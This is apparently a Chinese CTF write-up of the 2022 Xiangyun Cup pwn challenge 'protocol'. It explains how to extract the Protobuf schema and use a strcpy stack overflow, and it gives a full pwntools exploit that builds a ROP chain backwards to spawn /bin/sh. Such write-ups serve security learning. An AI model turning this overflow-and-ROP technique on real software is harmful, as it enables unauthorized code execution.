祥云杯2022 pwn - protocol

祥云杯2022 pwn - protocol

一开始没看出来是Protobuf，搜了一圈里面的东西才知道是Protobuf
首先需要得到ctf.proto这个东西然后按着下面的顺序就行
错了的话就是需要安装
pip3 install protobuf pyqt5 pyqtwebengine requests websocket-client
git clone https://github.com/marin-m/pbtk
cd pbtk
./extractors/from_binary.py ../protocol ./
这个时候就可以得到一个ctf.proto的文件
把这个文件放到与题目文件同级的文件夹里
protoc --python_out=./ ./ctf.proto然后编译出ctf_pb2.py这个东西
然后在exp里导入ctf_pb2即可
这样子的话发送格式就是正常的

def send_payload(username = b'admin', password = b'admin'):
    d = ctf_pb2.pwn()
    d.username = username
    d.password = password
    strs = d.SerializeToString()
    r.sendafter(b'Login: ',strs)
1
2
3
4
5
6

漏洞点出在了strcpy中

在拷贝username和password的时候发生了栈溢出漏洞，因为username和password可控
直接放rop的话是不行的，因为\x00在strcpy中会被截断，所以倒着写rop
\x00的话可以利用strcpy最后会补上\x00这个特性来实现
笔者这里的rop就是read(0, xxxxx, 0x50)，execve(“xxxx”, 0, 0)来getshell

from pwn import *
import ctf_pb2

context(arch='amd64', os='linux', log_level='debug')

file_name = './protocol'

li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')

context.terminal = ['tmux','splitw','-h']

debug = 0
if debug:
    r = remote()
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

def send_payload(username = b'admin', password = b'admin'):
    d = ctf_pb2.pwn()
    d.username = username
    d.password = password
    strs = d.SerializeToString()
    r.sendafter(b'Login: ',strs)

pop_rdi_ret = 0x0000000000404982
pop_rsi_ret = 0x0000000000588bbe
pop_rdx_ret = 0x000000000040454f
pop_rax_ret = 0x00000000005bdb8a
syscall = elf.search(asm('syscall\nret')).__next__()

def p1(offest, p):
    for i in range(8):
        send_payload(b'a' * (offest + 7 - i))
    send_payload(b'a' * offest + p64(p)[:3])

def p2(offest):
    for i in range(8):
        send_payload(b'a' * (offest + 7 - i))

bin_sh = 0x81B330

p1(0x1c0, syscall)
p2(0x1b8)
p1(0x1b0, pop_rdx_ret)
p2(0x1a8)
p1(0x1a0, pop_rsi_ret)
p1(0x198, bin_sh)
p1(0x190, pop_rdi_ret)

for i in range(8):
    send_payload(b'a' * (0x188 + 7 - i))
send_payload(b'a' * 0x188 + p64(0x3b)[:1])

p1(0x180, pop_rax_ret)

p1(0x178, syscall)

for i in range(8):
    send_payload(b'a' * (0x170 + 7 - i))
send_payload(b'a' * 0x170 + p64(0x50)[:1])

p1(0x168, pop_rdx_ret)
p1(0x160, bin_sh)
p1(0x158, pop_rsi_ret)
p2(0x150)
p1(0x148, pop_rdi_ret)

send_payload()
r.send('/bin/sh\x00')

r.interactive()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77